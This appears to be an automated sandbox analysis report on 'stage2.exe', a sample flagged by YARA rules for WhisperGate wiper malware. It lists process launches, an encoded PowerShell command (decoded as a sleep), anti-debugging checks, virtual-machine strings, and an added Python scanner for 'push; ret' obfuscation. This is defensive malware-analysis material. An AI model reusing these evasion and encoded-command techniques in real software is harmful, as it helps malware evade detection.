    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: Process Memory Space: powershell.exe PID: 7160, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: Process Memory Space: powershell.exe PID: 7140, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: stage2.exe, 00000001.00000000.439903603.0000000000EA8000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exe, 00000001.00000002.480852082.000000000161A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exe, 00000001.00000000.438479767.000000000161A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exe | Binary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: stage2.exe | Static PE information: invalid certificate
    Source: stage2.exe | Virustotal: Detection: 44%
    Source: stage2.exe | ReversingLabs: Detection: 48%
    Source: C:\Users\user\Desktop\stage2.exe | File read: C:\Users\user\Desktop\stage2.exe
    Source: stage2.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\stage2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Users\user\Desktop\stage2.exe "C:\Users\user\Desktop\stage2.exe"
    Source: C:\Users\user\Desktop\stage2.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Users\user\Desktop\stage2.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220117
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1
    Source: classification engine | Classification label: mal72.troj.evad.winEXE@8/14@1/2
    Source: C:\Users\user\Desktop\stage2.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Users\user\Desktop\stage2.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7084
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
    Source: C:\Users\user\Desktop\stage2.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\Desktop\stage2.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\stage2.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: stage2.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: stage2.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

    Data Obfuscation:

    .NET source code contains potential unpacker
    Source: stage2.exe, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.0.unpack, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.1.unpack, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.2.stage2.exe.ea0000.0.unpack, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 1.0.stage2.exe.ea0000.2.unpack, Facade.cs .Net Code: LogoutItem System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E77471 push C033084Eh; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E773CF push C033084Eh; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07E7F1A0 push eax; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07EA67E1 push es; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A327A0 push ebp; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A32780 push esp; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A3273A push esp; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_07A667E1 push es; ret
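The "push ...; ret" hits above are the raw form of the report's call/push/ret obfuscation signature: `push imm32; ret` is a disguised `jmp imm32` (the `ret` pops the pushed value straight into EIP), and the register and segment-register forms (`push eax; ret`, `push ebp; ret`, `push es; ret`) are indirect jumps through whatever was pushed. The scanner below is an added example, not code from the report or from Joe Sandbox: it finds these pairs in a raw 32-bit x86 byte buffer and resolves the immediate form to its jump target. The sample buffer is constructed for the example; only the operands mirror the report's hits, and the base address is an arbitrary value.

```python
"""
Find `push <operand>; ret` pairs in raw 32-bit x86 code, the pattern behind the
report's "Uses code obfuscation techniques (call, push, ret)" hits.

push imm32; ret  == jmp imm32     (ret pops the pushed value into EIP)
push r32 ; ret   == jmp r32       (control goes wherever the register points)
push sreg; ret   == jump to a selector value; almost always junk/data, not code
"""
import struct
from dataclasses import dataclass
from typing import List, Optional

RET = 0xC3
PUSH_IMM32 = 0x68                       # push imm32 is 5 bytes: 68 <imm32 LE>
PUSH_REG = {                            # one-byte push r32: 0x50 + register number
    0x50: "eax", 0x51: "ecx", 0x52: "edx", 0x53: "ebx",
    0x54: "esp", 0x55: "ebp", 0x56: "esi", 0x57: "edi",
}
PUSH_SEG = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}   # one-byte push sreg


@dataclass
class PushRet:
    offset: int              # address of the push (buffer offset + base)
    operand: str             # "eax", "es", or the immediate as hex text
    target: Optional[int]    # resolved jump target for the immediate form


def find_push_ret(buf: bytes, base: int = 0) -> List[PushRet]:
    """Byte-scan buf for push/ret pairs; addresses are reported relative to base."""
    hits: List[PushRet] = []
    i, n = 0, len(buf)
    while i < n:
        op = buf[i]
        if op == PUSH_IMM32 and i + 5 < n and buf[i + 5] == RET:
            imm = struct.unpack_from("<I", buf, i + 1)[0]      # little-endian imm32
            hits.append(PushRet(base + i, f"0x{imm:08X}", imm))
            i += 6
            continue
        if op in PUSH_REG and i + 1 < n and buf[i + 1] == RET:
            hits.append(PushRet(base + i, PUSH_REG[op], None))
            i += 2
            continue
        if op in PUSH_SEG and i + 1 < n and buf[i + 1] == RET:
            hits.append(PushRet(base + i, PUSH_SEG[op], None))
            i += 2
            continue
        i += 1
    return hits


def describe(hit: PushRet) -> str:
    """Render a hit the way the report does, plus what the pair really means."""
    if hit.target is not None:
        return (f"{hit.offset:08X} push 0x{hit.target:08X}; ret"
                f"  -> disguised jmp 0x{hit.target:08X}")
    return f"{hit.offset:08X} push {hit.operand}; ret  -> indirect jump through {hit.operand}"


# Constructed sample buffer (not bytes from the analysed sample). The operands
# mirror the report's hits; the filler instructions and the base are made up.
SAMPLE = bytes([
    0x90, 0x90,                              # nop; nop
    0x68, 0x4E, 0x08, 0x33, 0xC0, 0xC3,      # push 0C033084Eh; ret
    0x33, 0xC0,                              # xor eax, eax
    0x50, 0xC3,                              # push eax; ret
    0x06, 0xC3,                              # push es; ret
    0x55, 0xC3,                              # push ebp; ret
    0xC3,                                    # lone ret: no preceding push, not a hit
])

if __name__ == "__main__":
    for h in find_push_ret(SAMPLE, base=0x07E77400):
        print(describe(h))
```

Two caveats for triage. The scan is a linear byte sweep, so a pair sitting inside another instruction's operand bytes is reported too; confirm hits against a proper disassembly before treating them as deliberate control-flow obfuscation. The report's own hits sit at 0x07Exxxxx / 0x07Axxxxx addresses in powershell.exe, a dynamically allocated region rather than the mapped image, which is where the CLR emits JIT-compiled code; pairs like `push es; ret` in such regions are usually data or trailing bytes, not an attacker's jump trick.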
    Source: C:\Users\user\Desktop\stage2.exe Process information set: NOOPENFILEERRORBOX (reported 40 times)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (reported 165 times)
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (reported 20 times)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3260
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1461
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4329
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3659
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmpBinary or memory string: Hyper-V
    Source: Amcache.hve.26.drBinary or memory string: VMware
    Source: Amcache.hve.26.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
    Source: Amcache.hve.26.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.26.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.26.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
    Source: powershell.exe, 00000002.00000002.341349368.000000000501B000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427690622.0000000004CA2000.00000004.00000001.sdmpBinary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475815541.0000000004BD3000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.478987968.0000000004B64000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479178780.0000000004BD3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.26.drBinary or memory string: VMware, Inc.me
    Source: WerFault.exe, 0000001A.00000003.473935861.0000000004BD3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Amcache.hve.26.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
    Source: Amcache.hve.26.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
    Source: Amcache.hve.26.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.26.drBinary or memory string: VMware7,1
    Source: Amcache.hve.26.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.26.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.26.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.26.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.26.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.26.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
    Source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4}{
    Source: powershell.exe, 0000000D.00000002.431025294.0000000007A94000.00000004.00000001.sdmpBinary or memory string: hell\v1.0\Modules\Hyper-V
    Source: Amcache.hve.26.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpBinary or memory string: hl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VhD
    Source: C:\Users\user\Desktop\stage2.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\stage2.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\stage2.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\stage2.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion:

    Encrypted powershell cmdline option found
    Source: C:\Users\user\Desktop\stage2.exe; Process created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exe; Process created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exe; Process created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exe; Process created: Base64 decoded Start-Sleep -s 10
    Source: C:\Users\user\Desktop\stage2.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Users\user\Desktop\stage2.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp; Binary or memory string: Program Manager
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp; Binary or memory string: Progman
    Source: stage2.exe, 00000001.00000000.438797900.0000000001D10000.00000002.00020000.sdmp, stage2.exe, 00000001.00000000.440989456.0000000001D10000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\stage2.exe; Queries volume information: C:\Users\user\Desktop\stage2.exe VolumeInformation
    Source: C:\Users\user\Desktop\stage2.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
